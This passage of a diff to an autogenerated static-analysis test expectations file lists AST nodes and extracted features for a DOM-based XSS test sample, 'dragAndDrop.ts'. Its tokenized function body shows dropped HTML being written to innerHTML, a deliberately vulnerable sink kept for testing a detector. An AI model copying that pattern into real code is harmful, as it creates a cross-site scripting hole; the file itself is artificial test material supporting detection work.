drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:27:60:29 | Set | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:27:60:29 | Set | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:27:60:29 | Set | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:60:27:60:29 | Set | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:9 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:9 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:9 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:9 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:9 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:22 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:22 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:22 | e.dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:22 | e.dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:22 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:28 | e.dataTransfer.files | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:28 | e.dataTransfer.files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:28 | e.dataTransfer.files | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:28 | e.dataTransfer.files | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:28 | e.dataTransfer.files | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:35 | e.dataT ... .length | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:35 | e.dataT ... .length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:35 | e.dataT ... .length | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:35 | e.dataT ... .length | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:35 | e.dataT ... .length | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:39 | e.dataT ... gth > 0 | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:39 | e.dataT ... gth > 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:39 | e.dataT ... gth > 0 | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:39 | e.dataT ... gth > 0 | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:9:63:39 | e.dataT ... gth > 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:11:63:22 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:11:63:22 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:11:63:22 | dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:11:63:22 | dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:11:63:22 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:24:63:28 | files | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:24:63:28 | files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:24:63:28 | files | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:24:63:28 | files | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:24:63:28 | files | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:30:63:35 | length | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:30:63:35 | length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:30:63:35 | length | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:30:63:35 | length | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:30:63:35 | length | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:39:63:39 | 0 | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:39:63:39 | 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:39:63:39 | 0 | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:39:63:39 | 0 | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:63:39:63:39 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:16 | i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:16 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:16 | i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:16 | i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:16 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i = 0 | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i = 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i = 0 | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i = 0 | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:16:65:20 | i = 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:20:65:20 | 0 | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:20:65:20 | 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:20:65:20 | 0 | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:20:65:20 | 0 | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:20:65:20 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:23 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:53 | i < e.d ... .length | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:53 | i < e.d ... .length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:53 | i < e.d ... .length | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:53 | i < e.d ... .length | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:23:65:53 | i < e.d ... .length | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:27 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:27 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:27 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:27 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:27 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:40 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:40 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:40 | e.dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:40 | e.dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:40 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:46 | e.dataTransfer.files | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:46 | e.dataTransfer.files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:46 | e.dataTransfer.files | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:46 | e.dataTransfer.files | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:46 | e.dataTransfer.files | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:53 | e.dataT ... .length | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:53 | e.dataT ... .length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:53 | e.dataT ... .length | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:53 | e.dataT ... .length | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:27:65:53 | e.dataT ... .length | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:29:65:40 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:29:65:40 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:29:65:40 | dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:29:65:40 | dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:29:65:40 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:42:65:46 | files | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:42:65:46 | files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:42:65:46 | files | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:42:65:46 | files | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:42:65:46 | files | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:48:65:53 | length | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:48:65:53 | length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:48:65:53 | length | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:48:65:53 | length | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:48:65:53 | length | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:56 | i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:56 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:56 | i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:56 | i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:56 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i++ | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i++ | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i++ | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i++ | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:65:56:65:58 | i++ | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:18 | file | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:18 | file | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:18 | file | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:18 | file | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:18 | file | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:44 | file = ... iles[i] | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:66:15:66:44 | file = ... iles[i] | contextSurroundingFunctionParameters | (e) | +| 